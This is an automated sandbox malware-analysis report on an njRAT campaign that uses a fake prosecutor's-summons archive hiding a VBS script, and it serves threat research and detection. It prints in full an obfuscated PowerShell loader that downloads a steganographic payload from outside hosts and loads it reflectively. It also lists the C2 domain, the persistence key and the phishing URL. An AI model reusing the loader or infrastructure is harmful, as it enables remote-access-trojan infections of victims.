URL: https://servicioselectronicos22.lt.acemlnc.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZjZG4uZGlzY29yZGFwcC5jb20lMkZhdHRhY2htZW50cyUyRjEyMDgwNDY1NTg5NzM3OTIzMjklMkYxMjIwMzM3MzQ4MDM0ODI2MjYwJTJGRklTQ0FMSUFfQ0lUQUNJT05FUy1QREYudGFyJTNGZXglM0Q2NjBlOTJiOCUyNmlzJTNENjVmYzFkYjglMjZobSUzRDcwYWQyZDViMGU1ODRkOWZiNTQxMjczNmYyZWEwZTc5ZTEwOTQwYTNlZGU2N2FiNTczYzIyOTUwNmQzNjRiNDclMjY=&sig=FhxubgPtUu9JCK1gwh6M2hh5MwTmoAM7wTipiAP3SRqg&iat=1711023987&a=%7C%7C28533470%7C%7C&account=servicioselectronicos22%2Eactivehosted%2Ecom&email=KAlmcUlQuqdBrJoLbrhAm3b9rwLswrACWOVmBt3EFypWyrCXhbsYMQinlHQubfjmKMljIhEgSqQ%3D%3ApJ58ZDz4j0B8v1es0iYoL0DMrRuL64gI&s=08d8f5642c2eddc64e297ba1c032dd0e&i=5A11A2A17

Full analysis: https://app.any.run/tasks/1d33daff-b25e-4755-a8a5-3a729e21c947
Verdict: Malicious activity
Threats:

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market, with an abundance of educational material available; interested attackers can even find tutorials on YouTube. This has made it one of the most popular RATs in the world.

Analysis date: March 21, 2024, 17:22:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: stegocampaign, rat, njrat, bladabindi, remote
Indicators:
MD5: 794FF856E8FEA700DF734AC6E777BCC0
SHA1: 3C9D6AAB66EA573F0A08B82EE74374C82148355B
SHA256: FBD55EF10B87C47254F074BF8EB7AF568BA7E719FCEC3175D5AE1559BE9F6083
SSDEEP: 12:2lQN3WUxfzIEn59+pwzeoefUYiD1GOc81j+v3zVpGcSdL9am6wyNNUj8b:2MTBhT+pwvewc6O3qDP6wy7Vb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the user's information. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 1216)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 1216)
    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 1216)
    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 1216)
      • powershell.exe (PID: 3312)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3312)
      • powershell.exe (PID: 2192)
      • powershell.exe (PID: 1656)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3312)
      • powershell.exe (PID: 2192)
    • Stego campaign has been detected

      • powershell.exe (PID: 3312)
    • Unusual connection from system programs

      • wscript.exe (PID: 1216)
    • Drops the executable file immediately after the start

      • Skype-Setup.exe (PID: 324)
      • Skype-Setup.exe (PID: 2332)
    • NjRAT is detected

      • AddInProcess32.exe (PID: 3344)
    • NJRAT has been detected (YARA)

      • AddInProcess32.exe (PID: 3344)
    • Connects to the CnC server

      • AddInProcess32.exe (PID: 3344)
    • NJRAT has been detected (SURICATA)

      • AddInProcess32.exe (PID: 3344)
  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 1216)
      • powershell.exe (PID: 2192)
      • Skype.exe (PID: 548)
      • Skype-Setup.tmp (PID: 3304)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 1216)
      • powershell.exe (PID: 3312)
      • powershell.exe (PID: 2192)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 1216)
      • powershell.exe (PID: 3312)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 1216)
    • Application launched itself

      • powershell.exe (PID: 3312)
      • Skype.exe (PID: 548)
      • powershell.exe (PID: 2192)
    • Found IP address in command line

      • powershell.exe (PID: 2192)
    • Probably download files using WebClient

      • powershell.exe (PID: 3312)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 2192)
    • Unusual connection from system programs

      • powershell.exe (PID: 2192)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 1216)
    • Executable content was dropped or overwritten

      • Skype-Setup.exe (PID: 324)
      • Skype-Setup.exe (PID: 2332)
    • Reads the Windows owner or organization settings

      • Skype-Setup.tmp (PID: 3304)
    • Searches for installed software

      • Skype-Setup.tmp (PID: 3304)
    • Uses TASKKILL.EXE to kill process

      • Skype-Setup.tmp (PID: 3304)
    • Reads security settings of Internet Explorer

      • Skype-Setup.tmp (PID: 3304)
    • Non-standard symbols in registry

      • Skype-Setup.tmp (PID: 3304)
    • Connects to unusual port

      • AddInProcess32.exe (PID: 3344)
  • INFO

    • Manual execution by a user

      • WinRAR.exe (PID: 568)
      • explorer.exe (PID: 1992)
      • wscript.exe (PID: 1216)
      • WinRAR.exe (PID: 1584)
      • WinRAR.exe (PID: 2560)
      • Skype.exe (PID: 548)
      • notepad++.exe (PID: 3488)
    • The process uses the downloaded file

      • iexplore.exe (PID: 1696)
      • WinRAR.exe (PID: 568)
    • Modifies the phishing filter of IE

      • iexplore.exe (PID: 1696)
    • Application launched itself

      • iexplore.exe (PID: 1696)
    • Checks supported languages

      • Skype.exe (PID: 548)
      • Skype.exe (PID: 2740)
      • Skype.exe (PID: 3136)
      • Skype.exe (PID: 3044)
      • Skype-Setup.exe (PID: 324)
      • Skype.exe (PID: 3844)
      • Skype-Setup.tmp (PID: 3060)
      • Skype-Setup.tmp (PID: 3304)
      • Skype.exe (PID: 2524)
      • Skype-Setup.exe (PID: 2332)
      • AddInProcess32.exe (PID: 3344)
    • Reads Environment values

      • Skype.exe (PID: 548)
    • Reads product name

      • Skype.exe (PID: 548)
    • Reads the computer name

      • Skype.exe (PID: 3136)
      • Skype.exe (PID: 3044)
      • Skype-Setup.tmp (PID: 3060)
      • Skype.exe (PID: 3844)
      • Skype.exe (PID: 548)
      • Skype-Setup.tmp (PID: 3304)
      • Skype.exe (PID: 2524)
      • AddInProcess32.exe (PID: 3344)
    • Create files in a temporary directory

      • Skype-Setup.exe (PID: 324)
      • Skype-Setup.exe (PID: 2332)
      • Skype-Setup.tmp (PID: 3304)
    • Creates files or folders in the user directory

      • Skype.exe (PID: 548)
    • Reads CPU info

      • Skype.exe (PID: 548)
    • Creates files in the program directory

      • powershell.exe (PID: 1656)
    • Reads the machine GUID from the registry

      • AddInProcess32.exe (PID: 3344)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX in the full report

NjRat

Process: AddInProcess32.exe (PID 3344)
C2: junio2023.duckdns.org
Ports: 3333
Botnet: NYAN CAT
Options:
  Auto-run registry key: Software\Microsoft\Windows\CurrentVersion\Run\7952b2688d
  Splitter: @!#&^%$
  Version: 0.7NC
All screenshots are available in the full report
Total processes: 72
Monitored processes: 23
Malicious processes: 6
Suspicious processes: 2

Behavior graph

start iexplore.exe no specs iexplore.exe explorer.exe no specs winrar.exe no specs winrar.exe no specs winrar.exe no specs wscript.exe #STEGOCAMPAIGN powershell.exe no specs powershell.exe skype.exe skype.exe skype.exe no specs skype.exe no specs skype-setup.exe skype.exe no specs skype-setup.tmp no specs skype.exe no specs skype-setup.exe skype-setup.tmp no specs taskkill.exe no specs powershell.exe no specs #NJRAT addinprocess32.exe notepad++.exe

Process information

Fields: PID, CMD, Path, Indicators, Parent process

PID: 324
CMD: "C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Skype-Setup.exe" /silent !desktopicon
Path: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Skype-Setup.exe
Parent process: Skype.exe
User: admin
Company: Skype Technologies S.A.
Integrity Level: MEDIUM
Description: Skype Setup
Exit code: 5
Version: 8.110.0.218
Modules (images):
c:\users\admin\appdata\roaming\microsoft\skype for desktop\skype-setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
PID: 548
CMD: "C:\Program Files\Microsoft\Skype for Desktop\Skype.exe" --share-file="C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF\INFORMACION DETALLADA PROCESO DE CITACION FISCALIA DETALLES RADICADO No 2024-663259-998569-99659-PDF.vbs"
Path: C:\Program Files\Microsoft\Skype for Desktop\Skype.exe
Parent process: explorer.exe
User: admin
Company: Skype Technologies S.A.
Integrity Level: MEDIUM
Description: Skype
Exit code: 1
Version: 8.110.0.215
Modules (images):
c:\program files\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\microsoft\skype for desktop\ffmpeg.dll
c:\windows\system32\uiautomationcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
PID: 568
CMD: "C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF.tar" "?\"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.91.0
Modules (images):
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 1216
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF\INFORMACION DETALLADA PROCESO DE CITACION FISCALIA DETALLES RADICADO No 2024-663259-998569-99659-PDF.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Exit code: 0
Version: 5.8.7600.16385
Modules (images):
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1584
CMD: "C:\Program Files\WinRAR\WinRAR.exe" x -iext -ow -ver -- "C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF\INFORMACION DETALLADA PROCESO DE CITACION FISCALIA DETALLES RADICADO No 2024-663259-998569-99659-PDF.tar.part1.rar" C:\Users\admin\Downloads\FISCALIA_CITACIONES-PDF\
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.91.0
Modules (images):
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 1656
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1696
CMD: "C:\Program Files\Internet Explorer\iexplore.exe" "https://servicioselectronicos22.lt.acemlnc.com/Prod/link-tracker?redirectUrl=aHR0cHMlM0ElMkYlMkZjZG4uZGlzY29yZGFwcC5jb20lMkZhdHRhY2htZW50cyUyRjEyMDgwNDY1NTg5NzM3OTIzMjklMkYxMjIwMzM3MzQ4MDM0ODI2MjYwJTJGRklTQ0FMSUFfQ0lUQUNJT05FUy1QREYudGFyJTNGZXglM0Q2NjBlOTJiOCUyNmlzJTNENjVmYzFkYjglMjZobSUzRDcwYWQyZDViMGU1ODRkOWZiNTQxMjczNmYyZWEwZTc5ZTEwOTQwYTNlZGU2N2FiNTczYzIyOTUwNmQzNjRiNDclMjY=&sig=FhxubgPtUu9JCK1gwh6M2hh5MwTmoAM7wTipiAP3SRqg&iat=1711023987&a=%7C%7C28533470%7C%7C&account=servicioselectronicos22%2Eactivehosted%2Ecom&email=KAlmcUlQuqdBrJoLbrhAm3b9rwLswrACWOVmBt3EFypWyrCXhbsYMQinlHQubfjmKMljIhEgSqQ%3D%3ApJ58ZDz4j0B8v1es0iYoL0DMrRuL64gI&s=08d8f5642c2eddc64e297ba1c032dd0e&i=5A11A2A17"
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Internet Explorer
Exit code: 1
Version: 11.00.9600.16428 (winblue_gdr.131013-1700)
Modules (images):
c:\program files\internet explorer\iexplore.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
PID: 1992
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Modules (images):
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 2192
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/739/227/original/new_image.jpg?1707826222', 'http://45.74.19.84/xampp/bkp/vbs_novo_new_image.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/Lp1IW/d/ee.etsap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','AddInProcess32',''))} }"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2332
CMD: "C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Skype-Setup.exe" /SPAWNWND=$12014E /NOTIFYWND=$1001F6 /silent !desktopicon
Path: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Skype-Setup.exe
Parent process: Skype-Setup.tmp
User: admin
Company: Skype Technologies S.A.
Integrity Level: HIGH
Description: Skype Setup
Exit code: 5
Version: 8.110.0.218
Modules (images):
c:\users\admin\appdata\roaming\microsoft\skype for desktop\skype-setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
Total events: 34 952
Read events: 34 760
Write events: 159
Delete events: 33

Modification events

PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing | Operation: write | Name: NTPDaysSinceLastAutoMigration | Value: 1
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing | Operation: write | Name: NTPLastLaunchLowDateTime | Value:
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing | Operation: write | Name: NTPLastLaunchHighDateTime | Value: 31095732
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager | Operation: write | Name: NextCheckForUpdateLowDateTime | Value:
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager | Operation: write | Name: NextCheckForUpdateHighDateTime | Value: 31095732
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | Operation: write | Name: CachePrefix | Value:
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | Operation: write | Name: CachePrefix | Value: Cookie:
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | Operation: write | Name: CachePrefix | Value: Visited:
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main | Operation: write | Name: CompatibilityFlags | Value: 0
PID 1696 iexplore.exe | Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | Operation: write | Name: ProxyBypass | Value: 1
Executable files: 2
Suspicious files: 22
Text files: 8
Unknown types: 9

Dropped files

PID | Process | Filename | Type
3960 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62 | binary
  MD5: E72B3CFDEC97702CF5659E20BC0A7EED
  SHA256: 486C27938A577472C0EDC1AC274E6AF3A59FDDAADF26B68B94B3BFAD2A4D0019
3960 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62 | der
  MD5: FDF5182801345D5C8B74EECE573E312B
  SHA256: 24A7EDBC86141CBEA219671DA0CB371A6BDF51BB3505E76D196E53B9B9956872
3960 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894 | binary
  MD5: 3D5DFC634E14250BB16BA321C55A4C92
  SHA256: A8D616746B1215E0F1B93AFE7921D80745877EC04A2F83EEFAD9FE958A48E8AC
3960 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_645BC4A49DCDC40FE5917FA45C6D4517 | binary
  MD5: C69095E576D08B84AB7F70E999E292CB
  SHA256: 21A834FF786D819AA92715A2C1C1F3D7AEC4FE8E3D938BB4F6F25A2E10E7077D
3960 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\83D863F495E7D991917B3ABB3E1EB382_1CF3CD648CFFE038A8327ADAF3322CD2 | der
  MD5: EFA5D5A6945335FFE1746E9CED57114E
  SHA256: 846AEA23794964605EBD99A0E557BDB07B975F3C6261A9ACD25E97D2945B0F0F
3960 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894 | der
  MD5: 735B6F3EA50B9B723DF5FCE3A237395D
  SHA256: 44C695039CBC1E44238AE4C1140C01A9711C33DFCC18F594BD4A318FF3DDCE40
1696 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{A802632F-E7A7-11EE-AE0A-12A9866C77DE}.dat | binary
  MD5: 6089F81DBE1CB6669727FDD08788F201
  SHA256: 94043B393E64C82FDD28E4A16E335444F0AA8B350F6286FF3EF7BA40917A6A8B
3960 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MFAQUS6V\FISCALIA_CITACIONES-PDF[1].tar | compressed
  MD5: 59899999C9A828EC8C6FCF5D12A011AD
  SHA256: F5DEE7C34704B3650F3C4ABA1BA8A568D47BC37586C4B8BD9B2734ACA42881A8
3960 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | binary
  MD5: F198A0CAA9708D5390B63B33A87A33DD
  SHA256: BDC5CDEE984C627F93C2136FA07D66B5278532463D81976FAC2FD05EE1DC0D97
1696 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DFED4AD8B0C2E4F049.TMP | binary
  MD5: 0B01C57810212B2AF8ACE061621B88B7
  SHA256: 7B5B46BF6C7CE0123E3D8892D5F07ABA093E7D446FEEF094609109D0FF6346C4
Download PCAP, analyze network streams, HTTP content and a lot more in the full report
HTTP(S) requests: 9
TCP/UDP connections: 25
DNS requests: 18
Threats: 20

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3960 | iexplore.exe | GET | 304 | 88.221.110.106:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?f45bb2f3c9a14db9 | unknown | - | - | unknown
3960 | iexplore.exe | GET | 304 | 88.221.110.106:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?36ca310eb28aaa33 | unknown | - | - | unknown
3960 | iexplore.exe | GET | 200 | 108.138.2.10:80 | http://o.ss2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D | unknown | binary | 2.02 Kb | unknown
3960 | iexplore.exe | GET | 200 | 18.245.39.64:80 | http://ocsp.rootg2.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBSIfaREXmfqfJR3TkMYnD7O5MhzEgQUnF8A36oB1zArOIiiuG1KnPIRkYMCEwZ%2FlEoqJ83z%2BsKuKwH5CO65xMY%3D | unknown | binary | 1.49 Kb | unknown
3960 | iexplore.exe | GET | 200 | 18.245.39.64:80 | http://ocsp.rootca1.amazontrust.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPWaOUU8%2B5VZ5%2Fa9jFTaU9pkK3FAQUhBjMhTTsvAyUlC4IWZzHshBOCggCEwdzEkzUBtJnwJkc3SmanzgxeYU%3D | unknown | binary | 1.37 Kb | unknown
3960 | iexplore.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D | unknown | binary | 1.47 Kb | unknown
1080 | svchost.exe | GET | 304 | 2.16.100.152:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e2ddf83a2417bb20 | unknown | compressed | 67.5 Kb | unknown
3960 | iexplore.exe | GET | 200 | 18.173.208.27:80 | http://ocsp.r2m03.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQqHI%2BsdmapawQncL1rpCEZZ8gTSAQUVdkYX9IczAHhWLS%2Bq9lVQgHXLgICEARXBmF0edQaVZNxqATVgMU%3D | unknown | binary | 471 b | unknown
1080 | svchost.exe | GET | 200 | 2.16.100.152:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e90c163b6659448e | unknown | compressed | 67.5 Kb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
1080 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
3960 | iexplore.exe | 44.214.122.29:443 | servicioselectronicos22.lt.acemlnc.com | AMAZON-AES | US | unknown
3960 | iexplore.exe | 88.221.110.106:80 | ctldl.windowsupdate.com | Akamai International B.V. | DE | unknown
3960 | iexplore.exe | 108.138.2.10:80 | o.ss2.us | AMAZON-02 | US | unknown
3960 | iexplore.exe | 18.245.39.64:80 | ocsp.rootg2.amazontrust.com | - | US | unknown
3960 | iexplore.exe | 18.173.208.27:80 | ocsp.r2m03.amazontrust.com | - | US | unknown
3960 | iexplore.exe | 162.159.135.233:443 | cdn.discordapp.com | CLOUDFLARENET | - | shared
3960 | iexplore.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted

DNS requests

Domain
IP
Reputation
servicioselectronicos22.lt.acemlnc.com
  • 44.214.122.29
  • 3.220.97.117
  • 54.172.156.139
unknown
ctldl.windowsupdate.com
  • 88.221.110.106
  • 2.16.100.171
  • 2.16.100.177
  • 2.16.100.138
  • 2.16.100.152
  • 88.221.110.65
  • 2.16.100.169
whitelisted
o.ss2.us
  • 108.138.2.10
  • 108.138.2.195
  • 108.138.2.173
  • 108.138.2.107
whitelisted
ocsp.rootg2.amazontrust.com
  • 18.245.39.64
whitelisted
ocsp.rootca1.amazontrust.com
  • 18.245.39.64
shared
ocsp.r2m03.amazontrust.com
  • 18.173.208.27
unknown
cdn.discordapp.com
  • 162.159.135.233
  • 162.159.134.233
  • 162.159.130.233
  • 162.159.133.233
  • 162.159.129.233
shared
ocsp.digicert.com
  • 192.229.221.95
whitelisted
paste.ee
  • 188.114.96.3
  • 188.114.97.3
shared
uploaddeimagens.com.br
  • 188.114.97.3
  • 188.114.96.3
shared

Threats

PID
Process
Class
Message
1080
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
3960
iexplore.exe
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
3960
iexplore.exe
Misc activity
ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
1216
wscript.exe
Potential Corporate Privacy Violation
ET POLICY Pastebin-style Service (paste .ee) in TLS SNI
2192
powershell.exe
Potential Corporate Privacy Violation
ET POLICY Pastebin-style Service (paste .ee) in TLS SNI
1080
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
1080
svchost.exe
Misc activity
ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
3344
AddInProcess32.exe
Malware Command and Control Activity Detected
ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
3344
AddInProcess32.exe
Malware Command and Control Activity Detected
ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
1080
svchost.exe
Potentially Bad Traffic
ET INFO DYNAMIC_DNS Query to a *.duckdns .org Domain
7 ETPRO signatures available in the full report
Process
Message
Skype.exe
[0321/172515.714:ERROR:filesystem_win.cc(130)] GetFileAttributes C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Crashpad\attachments\3a0ee62b-79ac-4cc3-bbd5-f65252e7a91f: The system cannot find the file specified. (0x2)
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: certificate revocation checking is disabled
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\updater\gup.exe
notepad++.exe
ED255D9151912E40DF048A56288E969A8D0DAFA3
notepad++.exe
VerifyLibrary: C:\Program Files\Notepad++\plugins\Config\nppPluginList.dll
notepad++.exe
